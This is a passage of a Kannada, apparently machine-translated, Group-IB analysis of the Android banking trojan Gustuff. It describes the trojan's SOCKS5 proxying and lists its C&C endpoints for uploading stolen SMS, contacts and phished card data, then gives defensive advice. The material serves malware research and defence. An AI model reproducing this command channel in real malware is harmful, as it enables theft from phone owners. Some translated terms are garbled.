connectionId ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ (ಹೊಸ ಸಂಪರ್ಕವನ್ನು ರಚಿಸಲು) ಕಮಾಂಡ್ ಕನೆಕ್ಷನ್ ವರ್ಗದ ಉದಾಹರಣೆಯನ್ನು ರಚಿಸುತ್ತದೆ ಪ್ರಾಕ್ಸಿಕನೆಕ್ಷನ್.

  • ಪ್ರಾಕ್ಸಿಯಿಂಗ್ನಲ್ಲಿ ಎರಡು ವರ್ಗಗಳು ಭಾಗವಹಿಸುತ್ತವೆ: ಪ್ರಾಕ್ಸಿಕನೆಕ್ಷನ್ и ಕೊನೆಯಲ್ಲಿ. ವರ್ಗವನ್ನು ರಚಿಸುವಾಗ ಪ್ರಾಕ್ಸಿಕನೆಕ್ಷನ್ ವಿಳಾಸಕ್ಕೆ ಸಂಪರ್ಕಿಸಲಾಗುತ್ತಿದೆ ProxyConfigClass.host: ProxyConfigClass.proxyPort ಮತ್ತು JSON ಆಬ್ಜೆಕ್ಟ್ ಅನ್ನು ಹಾದುಹೋಗುವುದು:

 {
    "id":<%connectionId%>
}

ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ, ಸಂಪರ್ಕವನ್ನು ಸ್ಥಾಪಿಸಬೇಕಾದ ದೂರಸ್ಥ ಸರ್ವರ್‌ನ ವಿಳಾಸವನ್ನು ಒಳಗೊಂಡಿರುವ SOCKS5 ಸಂದೇಶವನ್ನು ಸರ್ವರ್ ಕಳುಹಿಸುತ್ತದೆ. ಈ ಸರ್ವರ್‌ನೊಂದಿಗೆ ಸಂವಹನವು ವರ್ಗದ ಮೂಲಕ ಸಂಭವಿಸುತ್ತದೆ ಕೊನೆಯಲ್ಲಿ. ಸಂಪರ್ಕ ಸೆಟಪ್ ಅನ್ನು ಈ ಕೆಳಗಿನಂತೆ ಕ್ರಮಬದ್ಧವಾಗಿ ಪ್ರತಿನಿಧಿಸಬಹುದು:

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ

ನೆಟ್‌ವರ್ಕ್ ಸಂವಹನಗಳು

ನೆಟ್‌ವರ್ಕ್ ಸ್ನಿಫರ್‌ಗಳಿಂದ ಟ್ರಾಫಿಕ್ ವಿಶ್ಲೇಷಣೆಯನ್ನು ತಡೆಯಲು, CnC ಸರ್ವರ್ ಮತ್ತು ಅಪ್ಲಿಕೇಶನ್ ನಡುವಿನ ಪರಸ್ಪರ ಕ್ರಿಯೆಯನ್ನು SSL ಪ್ರೋಟೋಕಾಲ್ ಬಳಸಿ ರಕ್ಷಿಸಬಹುದು. ಸರ್ವರ್‌ನಿಂದ ಮತ್ತು ಸರ್ವರ್‌ಗೆ ರವಾನಿಸಲಾದ ಎಲ್ಲಾ ಡೇಟಾವನ್ನು JSON ಸ್ವರೂಪದಲ್ಲಿ ಪ್ರಸ್ತುತಪಡಿಸಲಾಗುತ್ತದೆ. ಕಾರ್ಯಾಚರಣೆಯ ಸಮಯದಲ್ಲಿ ಅಪ್ಲಿಕೇಶನ್ ಈ ಕೆಳಗಿನ ವಿನಂತಿಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ:

  • http://<%CnC%>/api/v1/set_state.php - ಆಜ್ಞೆಯ ಮರಣದಂಡನೆಯ ಫಲಿತಾಂಶ.
  • http://<%CnC%>/api/v1/get.php - ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸುವುದು.
  • http://<%CnC%>/api/v1/load_sms.php - ಸೋಂಕಿತ ಸಾಧನದಿಂದ SMS ಸಂದೇಶಗಳನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡುವುದು.
  • http://<%CnC%>/api/v1/load_ab.php - ಸೋಂಕಿತ ಸಾಧನದಿಂದ ಸಂಪರ್ಕಗಳ ಪಟ್ಟಿಯನ್ನು ಅಪ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತಿದೆ.
  • http://<%CnC%>/api/v1/aevents.php - ಪ್ರಾಶಸ್ತ್ಯ ಫೈಲ್‌ನಲ್ಲಿರುವ ನಿಯತಾಂಕಗಳನ್ನು ನವೀಕರಿಸುವಾಗ ವಿನಂತಿಯನ್ನು ಮಾಡಲಾಗುತ್ತದೆ.
  • http://<%CnC%>/api/v1/set_card.php — ಗೂಗಲ್ ಪ್ಲೇ ಮಾರ್ಕೆಟ್‌ನಂತೆ ಮಾಸ್ಕ್ವೆರೇಡಿಂಗ್ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ಬಳಸಿಕೊಂಡು ಪಡೆದ ಡೇಟಾವನ್ನು ಅಪ್‌ಲೋಡ್ ಮಾಡುವುದು.
  • http://<%CnC%>/api/v1/logs.php - ಲಾಗ್ ಡೇಟಾವನ್ನು ಅಪ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತಿದೆ.
  • http://<%CnC%>/api/v1/records.php - ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳ ಮೂಲಕ ಪಡೆದ ಡೇಟಾವನ್ನು ಅಪ್‌ಲೋಡ್ ಮಾಡುವುದು.
  • http://<%CnC%>/api/v1/set_error.php - ಸಂಭವಿಸಿದ ದೋಷದ ಸೂಚನೆ.

ಶಿಫಾರಸುಗಳನ್ನು

ಮೊಬೈಲ್ ಟ್ರೋಜನ್‌ಗಳ ಬೆದರಿಕೆಯಿಂದ ತಮ್ಮ ಗ್ರಾಹಕರನ್ನು ರಕ್ಷಿಸಲು, ಕಂಪನಿಗಳು ಬಳಕೆದಾರರ ಸಾಧನಗಳಲ್ಲಿ ಹೆಚ್ಚುವರಿ ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ಸ್ಥಾಪಿಸದೆ ದುರುದ್ದೇಶಪೂರಿತ ಚಟುವಟಿಕೆಯನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಲು ಮತ್ತು ತಡೆಯಲು ಅನುಮತಿಸುವ ಸಮಗ್ರ ಪರಿಹಾರಗಳನ್ನು ಬಳಸಬೇಕು.

ಇದನ್ನು ಮಾಡಲು, ಕ್ಲೈಂಟ್ ಮತ್ತು ಅಪ್ಲಿಕೇಶನ್ ಎರಡರ ನಡವಳಿಕೆಯನ್ನು ವಿಶ್ಲೇಷಿಸಲು ಮೊಬೈಲ್ ಟ್ರೋಜನ್‌ಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಲು ಸಹಿ ವಿಧಾನಗಳನ್ನು ತಂತ್ರಜ್ಞಾನಗಳೊಂದಿಗೆ ಬಲಪಡಿಸುವ ಅಗತ್ಯವಿದೆ. ಡಿಜಿಟಲ್ ಫಿಂಗರ್‌ಪ್ರಿಂಟ್ ತಂತ್ರಜ್ಞಾನವನ್ನು ಬಳಸಿಕೊಂಡು ಸಾಧನವನ್ನು ಗುರುತಿಸುವ ಕಾರ್ಯವನ್ನು ರಕ್ಷಣೆಯು ಒಳಗೊಂಡಿರಬೇಕು, ಇದು ವಿಲಕ್ಷಣ ಸಾಧನದಿಂದ ಖಾತೆಯನ್ನು ಯಾವಾಗ ಬಳಸಲಾಗುತ್ತಿದೆ ಮತ್ತು ಈಗಾಗಲೇ ವಂಚಕನ ಕೈಗೆ ಬಿದ್ದಿದೆ ಎಂಬುದನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಸಾಧ್ಯವಾಗಿಸುತ್ತದೆ.

ಮೂಲಭೂತವಾಗಿ ಪ್ರಮುಖವಾದ ಅಂಶವೆಂದರೆ ಕ್ರಾಸ್-ಚಾನೆಲ್ ವಿಶ್ಲೇಷಣೆಯ ಲಭ್ಯತೆ, ಇದು ಕಂಪನಿಗಳಿಗೆ ಇಂಟರ್ನೆಟ್‌ನಲ್ಲಿ ಮಾತ್ರವಲ್ಲದೆ ಮೊಬೈಲ್ ಚಾನಲ್‌ನಲ್ಲಿಯೂ ಉಂಟಾಗುವ ಅಪಾಯಗಳನ್ನು ನಿಯಂತ್ರಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ, ಉದಾಹರಣೆಗೆ, ಮೊಬೈಲ್ ಬ್ಯಾಂಕಿಂಗ್‌ಗಾಗಿ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ, ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿಗಳೊಂದಿಗಿನ ವಹಿವಾಟುಗಳಿಗಾಗಿ ಮತ್ತು ಇತರ ಯಾವುದೇ ವಹಿವಾಟುಗಳನ್ನು ಕೈಗೊಳ್ಳಬಹುದು.

ಬಳಕೆದಾರರಿಗೆ ಸುರಕ್ಷತಾ ನಿಯಮಗಳು:

  • Google Play ಹೊರತುಪಡಿಸಿ ಯಾವುದೇ ಮೂಲಗಳಿಂದ Android OS ನೊಂದಿಗೆ ಮೊಬೈಲ್ ಸಾಧನಕ್ಕಾಗಿ ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಬೇಡಿ, ಅಪ್ಲಿಕೇಶನ್ ವಿನಂತಿಸಿದ ಹಕ್ಕುಗಳಿಗೆ ವಿಶೇಷ ಗಮನ ಕೊಡಿ;
  • ನಿಯಮಿತವಾಗಿ Android OS ನವೀಕರಣಗಳನ್ನು ಸ್ಥಾಪಿಸಿ;
  • ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ಫೈಲ್‌ಗಳ ವಿಸ್ತರಣೆಗಳಿಗೆ ಗಮನ ಕೊಡಿ;
  • ಅನುಮಾನಾಸ್ಪದ ಸಂಪನ್ಮೂಲಗಳನ್ನು ಭೇಟಿ ಮಾಡಬೇಡಿ;
  • SMS ಸಂದೇಶಗಳಲ್ಲಿ ಸ್ವೀಕರಿಸಿದ ಲಿಂಕ್‌ಗಳನ್ನು ಕ್ಲಿಕ್ ಮಾಡಬೇಡಿ.

ನಟಿಸುತ್ತಿದ್ದಾರೆ ಸೆಮಿಯಾನ್ ರೋಗಚೇವಾ, ಗ್ರೂಪ್-IB ಕಂಪ್ಯೂಟರ್ ಫೊರೆನ್ಸಿಕ್ಸ್ ಲ್ಯಾಬೋರೇಟರಿಯಲ್ಲಿ ಮಾಲ್‌ವೇರ್ ಸಂಶೋಧನೆಯಲ್ಲಿ ಜೂನಿಯರ್ ಸ್ಪೆಷಲಿಸ್ಟ್.

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ